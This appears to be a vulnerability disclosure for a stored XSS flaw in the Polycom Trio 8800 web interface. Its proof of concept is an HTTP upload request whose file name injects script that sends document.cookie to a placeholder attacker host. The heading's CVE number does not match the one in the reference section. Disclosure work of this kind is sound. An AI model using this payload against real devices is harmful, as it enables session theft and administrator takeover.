Polycom Trio 8800 Vulnerability Disclosure

Proof of Concept:

Stored Cross Site Scripting (CVE-2023-24282):

POST /form-submit/Preferences/Ringtone/upload HTTP/1.1
Host: 10.26.222.125
Cookie: session=00000003-JL7azBc2p7bexJaAKqvCYVCG15HubMz
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------109391813519434785531297386274
Content-Length: 24321
Origin: https://10.26.222.125
Referer: https://10.26.222.125/index.htm
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------109391813519434785531297386274
Content-Disposition: form-data; name="383:2"; filename="'><img src=1 onerror=this.src='http:\x2F\x2FAttacker-IP\x2F?c='+document.cookie>.wav"
Content-Type: audio/x-wav

RIFF WAVEfmt
…SNIP…

Mitre Reference:

CVE-2022-37718

Vulnerability Type: Cross Site Scripting(XSS)
Vendor of Product: Polycom
Affected Product Code Base: Trio 8800 - 7.2.2.1094
Affected Component: Web Management Interface
Description: The Web Management Interface of Polycom Trio 8800 was discovered to contain a stored cross site scripting vulnerability. This vulnerability allows injection of arbitrary javascript and administrator takeover.
Attack Vectors: Remote authenticated attacker can inject malicious javascript code by sending a specially crafted request to Polycom Trio’s ringtone management endpoint.
Attack Type: Remote
Impact Code execution: false
Impact Escalation of Privileges: true
Impact Information Disclosure: true

Timeline:

19/01/23 - initial contact disclosure